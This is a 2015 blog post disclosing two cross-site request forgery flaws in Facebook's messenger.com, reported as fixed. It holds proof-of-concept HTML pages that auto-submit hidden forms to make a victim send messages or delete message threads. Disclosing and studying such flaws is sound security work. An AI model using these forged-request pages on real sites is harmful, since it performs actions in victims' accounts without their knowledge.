Tuesday, June 9, 2015

Facebook Messenger Multiple CSRF Vulnerabilities

In this post, I will be demonstrating the findings of multiple interesting cross-site request forgery vulnerabilities that I have identified on Facebook. These vulnerabilities allows an attacker to force the victim to do various actions.

On April 2015, Facebook officially launched messenger.com, a stand-alone Facebook messenger for the web. After hearing about the launch I have started to testing it in my spare time.

[*]Sending Unrestricted Messages to Any User via CSRF
Using this issue, I was able to force any user to send messages to other users without the user's knowledge.


<title>POC @mazen160</title> 
<body onload="javascript:document.csrf_form.submit()"> 
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/send_messages.php"> 
<input type="hidden" id="message_batch[0][author]" name="message_batch[0][author]" value="fbid:VALUE1">
<input type="hidden" id="message_batch[0][is_filtered_content]" name="message_batch[0][is_filtered_content]" value="false"> 
<input type="hidden" id="message_batch[0][is_spoof_warning]" name="message_batch[0][is_spoof_warning]" value="false"> 
<input type="hidden" id="message_batch[0][source]" name="message_batch[0][source]" value=""> 
<input type="hidden" id="message_batch[0][body]" name="message_batch[0][body]" value="@mazen160"> 
<input type="hidden" id="message_batch[0][specific_to_list][0]" name="message_batch[0][specific_to_list][0]" value="fbid:VALUE2"> 
<input type="hidden" id="message_batch[0][specific_to_list][1]" name="message_batch[0][specific_to_list][1]" value="fbid:VALUE1"> 
<input type="hidden" id="message_batch[0][client_thread_id]" name="message_batch[0][client_thread_id]" value="fbid:VALUE2"> 

VALUE1==From User
VALUE2==To Target

[*]Deleting Any messages via CSRF
Using this issue, I was able to force any user to delete messaging threads.

<title>POC @mazen160</title> 
<body onload="javascript:document.csrf_form.submit()"> 
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/delete_thread.php"> 
<input type="hidden" id="ids[0]" name="ids[0]" value="VALUE"> 
<input type="hidden" id="__user" name="__user" value=""> 
<input type="hidden" id="__a" name="__a" value="1"> 
<input type="hidden" id="__dyn" name="__dyn" value=""> 
<input type="hidden" id="__req" name="__req" value="p"> 
<input type="hidden" id="fb_dtsg" name="fb_dtsg" value=""> 
<input type="hidden" id="ttstamp" name="ttstamp" value=""> 
<input type="hidden" id="__rev" name="__rev" value=""> 

Change of the value of "ids[0]" parameter to the victim’s thread ID.

The issues has been fixed very quickly. I would like to thank Facebook security team for their outstanding work in responding to security submissions.

If you need any help securing your web-application or service, you can contact me by E-Mail, or Twitter.

1 comment: